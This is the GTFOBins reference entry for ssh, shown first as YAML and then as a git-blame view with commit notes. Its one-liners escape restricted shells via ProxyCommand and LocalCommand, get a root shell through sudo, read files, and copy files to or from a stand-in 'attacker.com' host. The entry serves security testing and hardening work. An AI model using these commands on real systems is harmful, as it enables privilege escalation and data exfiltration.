GTFOBins.github.io/_gtfobins/ssh.md

---
functions:
  shell:
    - description: Reconnecting may help bypassing restricted shells.
      code: ssh localhost $SHELL --noprofile --norc
    - description: Spawn interactive shell through ProxyCommand option.
      code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
    - description: Spawn interactive shell on client, requires a successful connection towards `host`.
      code: ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
  file-upload:
    - description: Send local file to a SSH server.
      code: |
        HOST=user@attacker.com
        RPATH=file_to_save
        LPATH=file_to_send
        ssh $HOST "cat > $RPATH" < $LPATH
  file-download:
    - description: Fetch a remote file from a SSH server.
      code: |
        HOST=user@attacker.com
        RPATH=file_to_get
        LPATH=file_to_save
        ssh $HOST "cat $RPATH" > $LPATH
  file-read:
    - description: The read file content is corrupted by error prints.
      code: |
        LFILE=file_to_read
        ssh -F $LFILE localhost
  sudo:
    - description: Spawn interactive root shell through ProxyCommand option.
      code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`shell:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Reconnecting may help bypassing restricted shells.`
			`code: ssh localhost $SHELL --noprofile --norc`
			`- description: Spawn interactive shell through ProxyCommand option.`
Make interactive execute whenever possible Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty) 2018-09-07 01:00:01 +02:00			`code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x`
Add LocalCommand option to SSH SSH has a LocalCommand option that will run a given command on the client machine after a successful connection. It is generally disabled, but can be enabled on the command line with "-oPermitLocalCommand=yes". This is useful for bypassing restricted shells. Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com> 2022-05-01 11:07:53 +02:00			- description: Spawn interactive shell on client, requires a successful connection towards `host`.
			`code: ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-upload:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Send local file to a SSH server.`
			`code: \|`
			`HOST=user@attacker.com`
			`RPATH=file_to_save`
			`LPATH=file_to_send`
			`ssh $HOST "cat > $RPATH" < $LPATH`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-download:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Fetch a remote file from a SSH server.`
			`code: \|`
			`HOST=user@attacker.com`
			`RPATH=file_to_get`
			`LPATH=file_to_save`
			`ssh $HOST "cat $RPATH" > $LPATH`
Add file-read to ssh 2018-05-28 09:44:53 +02:00			`file-read:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: The read file content is corrupted by error prints.`
			`code: \|`
			`LFILE=file_to_read`
			`ssh -F $LFILE localhost`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Spawn interactive root shell through ProxyCommand option.`
Make interactive execute whenever possible Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty) 2018-09-07 01:00:01 +02:00			`code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x`
First commit 2018-05-21 21:14:41 +02:00			`---`